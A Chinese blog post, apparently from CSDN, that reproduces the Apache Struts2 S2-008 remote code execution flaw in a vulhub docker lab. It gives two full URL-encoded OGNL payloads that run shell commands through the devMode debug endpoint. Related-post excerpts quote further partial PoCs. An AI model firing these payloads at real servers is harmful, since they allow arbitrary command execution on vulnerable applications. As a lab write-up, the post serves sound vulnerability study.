Struts S2-008复现

最新推荐文章于 2024-07-19 23:37:26 发布
最新推荐文章于 2024-07-19 23:37:26 发布
阅读量281 收藏
点赞数
分类专栏: 渗透测试 漏洞复现 文章标签: struts java 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZJT6666666/article/details/128398488
版权

1.漏洞描述

        devMode下支持直接执行OGNL表达式,Cookie 拦截器错误配置可造成 OGNL 表达式执行,生产环境一般不会存在该漏洞,但是开了debug模式就可以直接执行命令。

影响版本:Struts2 2.1.0 - 2.3.1

2.漏洞搭建

采用docker方式搭建,使用vulhub。

通过cd命令进入达到vulhub的靶场文件的位置。

通过以下命令启动环境

docker-compose build
docker-compose up -d

 通过ps查看端口号

访问搭建的环境(这种就代表环境搭建成功)

 

3.复现 

payload1:

devmode.action?debug=command&expression=(%23_memberAccess["allowStaticMethodAccess"]%3dtrue%2c%23foo%3dnew+java.lang.Boolean("false")+%2c%23context["xwork.MethodAccessor.denyMethodExecution"]%3d%23foo%2c%40org.apache.commons.io.IOUtils%40toString(%40java.lang.Runtime%40getRuntime().exec('ls+-al+./').getInputStream()))

 

payload2:

devmode.action?debug=command&expression=%23context["xwork.MethodAccessor.denyMethodExecution"]%3Dfalse%2C%23f%3D%23_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess")%2C%23f.setAccessible(true)%2C%23f.set(%23_memberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec("ls+-al").getInputStream()%2C%23b%3Dnew java.io.InputStreamReader(%23a)%2C%23c%3Dnew java.io.BufferedReader(%23b)%2C%23d%3Dnew char[50000]%2C%23c.read(%23d)%2C%23genxor%3D%23context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()

复现成功。

 

你能拿我咋的
关注
专栏目录
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞S2-008 (CVE-2012-0391)
qq_51577576的博客
10-15 1095
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞S2-008 (CVE-2012-0391) S2-008 涉及多个漏洞,主要利用对传入参数没有严格限制,导致多个地方可以执行恶意代码。 第一种情况其实就是 S2-007,在异常处理时的OGNL 执行第二种的cookie的方式,虽然在struts2没有对恶意代码进行限制,但是java的webserver(Tomcat),对cookie 的名称有较多限制,在传入struts2之前就被处理,从而较为鸡肋第三种需要开启devModedebug 模式。
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-052(CVE-2017-9805)
qq_51577576的博客
12-15 1493
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-052(CVE-2017-9805) Apache Struts2的REST插件存在远程代码执行的高危漏洞,其编号为CVE-2017-9805(S2-052)。Struts2 REST插件的XStream组件存在反序列化漏洞,使用XStream组件对XML格式的数据包进行反序列化操作时,未对数据内容进行有效验证,存在安全隐患,可被远程攻击。
在线靶场-墨者-命令执行2星-Apache Struts2远程代码执行漏洞(S2-008)复现
weixin_42079912的博客
08-09 393
S2-008漏洞原理:为了防止攻击者在参数中调用任意方法,标志xwork.MethodAccessor.denyMethodExecution被设置为true,并且SecurityMemberAccess字段默认allowStaticMethodAccess设置为false。 打开靶场网页,等网页加载完。如果没有加载完(靶场环境可能没有完全部署好),可能会影响工具检测结果。 方法一:Struts...
漏洞复现----30、Struts2/S2-008
七天
06-29 878
影响版本 2.1.0 - 2.3.1 漏洞原理 S2-008 涉及多个漏洞,Cookie 拦截器错误配置可造成 OGNL 表达式执行,但是由于大多 Web 容器(如 Tomcat)对 Cookie 名称都有字符限制,一些关键字符无法使用使得这个点显得比较鸡肋。另一个比较鸡肋的点就是在 struts2 应用开启 devMode 模式后会有多个调试接口能够直接查看对象信息或直接执行命令,正如 kxlzx 所提这种情况在生产环境中几乎不可能存在,因此就变得很鸡肋的,但我认为也不是绝对的,万一被黑了专门丢了一个开启
(RCE)(Struts2)s2-008漏洞学习笔记
最新发布
aaaadoga的博客
07-19 219
这篇文章是关于作者学习s2-008漏洞的笔记关于这篇文章,如果有建议或问题请留言或联系。
vulhub-struts2-S2-008 远程代码执行漏洞复现
qq_56426046的博客
06-19 492
影响版本: 2.1.0 - 2.3.1。
S2-008漏洞复现
baidu_38844729的博客
11-14 891
环境搭建 使用docker进行漏洞环境搭建,有关docker的安装和镜像部署可以参考我前面的博客 docker-compose build docker-compose up -d 漏洞利用 命令执行EXP http://localhost:8080/devmode.action?debug=command&expression=%23context%5B%22xwork.Method...
Apache Struts2远程代码执行漏洞(S2-008)复现
qq_36933272的博客
09-05 1317
漏洞原理:主要是利用对传入参数没有严格限制,导致多个地方可以执行恶意代码,传入?debug=command&expression=即可执行OGNL表达式 寻找poc:debug=command&expression=%23context%5b%22xwork.MethodAccessor.denyMethodExecution%22%5d%3dfalse%2c%23f%3d%23_...
Struts2 S2-046漏洞复现 (CVE-2017-5638)
1
05-27 3779
一:漏洞介绍 名称: struts2-046 远程代码执行 (CVE-2017-5638) 描述: Apache Struts是美国阿帕奇(Apache)软件基金会的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架,主要提供两个版本框架产品,Struts 1和Struts 2。 攻击者可以将恶意代码放入http报文头部的Content-Disposition的filename字段,通 过不恰当的filename字段或者大小超过2G的Content-Length字段来触发异常,进而导
Struts2-057远程代码执行漏洞(s2-057)复现
m0_48520508的博客
12-10 923
0x00简介 Apache Struts是美国阿帕奇(Apache)软件基金会负责维护的一个开源项目Struts2框架是一个用于开发Java EE网络应用程序的开放源代码网页应用程序架构。它利用并延伸了Java Servlet API,鼓励开发者采用MVC架构。Struts2以WebWork优秀的设计思想为核心,吸收了Struts框架的部分优点,提供了一个更加整洁的MVC设计模式实现的Web应用程序框架。 0x01漏洞概述 漏洞产生于网站配置XML时如果没有设置namespace的值,并且上层动作配置中并
Struts2-S2-029漏洞分析1
08-08
Struts2-S2-029漏洞是一个严重的问题,它涉及到OGNL(Object-Graph Navigation Language)表达式在Struts2框架中的不安全处理。此漏洞的根本原因是开发人员在处理OGNL表达式中的赋值操作时,错误地编写了判断条件,...
vulhub-S2-008 远程代码执行漏洞-漏洞复现
wocao___的博客
02-22 575
S2-008 远程代码执行漏洞 影响版本: 2.1.0 - 2.3.1 测试环境搭建 docker-compose up -d 原理 S2-008 涉及多个漏洞,Cookie 拦截器错误配置可造成 OGNL 表达式执行,但是由于大多 Web 容器(如 Tomcat)对 Cookie 名称都有字符限制,一些关键字符无法使用使得这个点显得比较鸡肋。另一个比较鸡肋的点就是在 struts2 应用开启 devMode 模 式后会有多个调试接口能够直接查看对象信息或直接执行命令,正如 kxlzx 所提这种情况在生
buuctf [struts2]s2-008
qq_1873822的博客
03-19 541
漏洞概述 主要是利用对传入参数没有严格限制,导致多个地方可以执行恶意代码 第一种情况其实就是S2-007,在异常处理时的OGNL执行 第二种的cookie的方式,虽然在struts2没有对恶意代码进行限制,但是java的webserver(Tomcat),对cookie的名称有较多限制,在传入struts2之前就被处理,从而较为鸡肋 第四种需要开启devModedebug模式。 https://www.freebuf.com/articles/web/25337.html POC devmode.acti
Apache Struts2远程代码执行漏洞(S2-008)复现总结
qq_45746681的博客
10-07 1709
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、漏洞原理2.复现 前言 记录并复现相关struts漏洞,加深理解 一、漏洞原理 主要是利用对传入参数没有严格限制,导致多个地方可以执行恶意代码,传入?debug=command&expression=即可执行OGNL表达式 2.复现 访问墨者学院strut2-008靶机 构造poc,执行命令ls,查看文件。 ?debug=command&expression=%23context%5B%22xwork
【vulhub】S2-008漏洞复现
qq_45300786的博客
07-08 437
poc http://192.168.100.23:8080/devmode.action?debug=command&expression=%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23_memberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true
墨者Apache Struts2远程代码执行漏洞(S2-008)复现题解
zr1213159840的博客
01-15 744
我们先查询一下这个漏洞的相关信息,链接如下: https://github.com/vulhub/vulhub/blob/master/struts2/s2-008/README.zh-cn.md 可以发现是直接在url后面添加相应的poc就会被执行,上面链接提供的不太行,主要似乎是弹出计算器的,我们使用如下的poc,由于这类题目的key都是在key.txt中,我们直接上手拿到key吧,也不用ls一步步看了。如果需要的话,也可替换相应的cat /key.txt命令为ls查看。 debug=command&a
s2系列——s2-007,s2-008,s2-009复现
qq_54030686的博客
03-02 4236
s2-007,s2-008,s2-009复现 简而言之就是payload的输入,具体复现这里不再复现,相关博文,也有蛮多,这里更新下脚本 s2-007 def s2007(url): try: proxy = '192.168.43.74:8080' # 本地代理 proxies = { 'http': 'http://' + proxy, 'https': 'https://' + proxy }
【研究】Struts2漏洞之S2-008漏洞环境和可用回显POC
god_Zeo的安全博客
07-01 3279
【研究】Struts2漏洞之S2-008漏洞环境和可用POC1.环境2.原理3.影响版本4.利用过程POC有效POC’’POC注意 1.环境 环境 https://github.com/vulhub/vulhub/blob/master/README.zh-cn.md 这个搭环境很方便快捷,具体可以看说明,很简单 2.原理 参考 http://rickgray.me/2016/05/06/revi...
s2-008远程代码执行漏洞
Stephen Wolf
11-18 1937
一、漏洞描述: S2-008 涉及多个漏洞,Cookie 拦截器错误配置可造成 OGNL 表达式执行,但是由于大多 Web 容器(如 Tomcat)对 Cookie 名称都有字符限制,一些关键字符无法使用使得这个点显得比较鸡肋。另一个比较鸡肋的点就是在 struts2 应用开启 devMode 模式后会有多个调试接口能够直接查看对象信息或直接执行命令,正如 kxlzx 所提这种情...
struts s2-20/21
09-02
S2-020和S2-021是Struts2框架中的两个安全漏洞。 S2-020漏洞是由于在处理**参数拦截器(ParameterInterceptor)**时存在安全问题而引起的。攻击者可以通过构造恶意的请求,利用漏洞执行任意的命令或获得未经授权的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值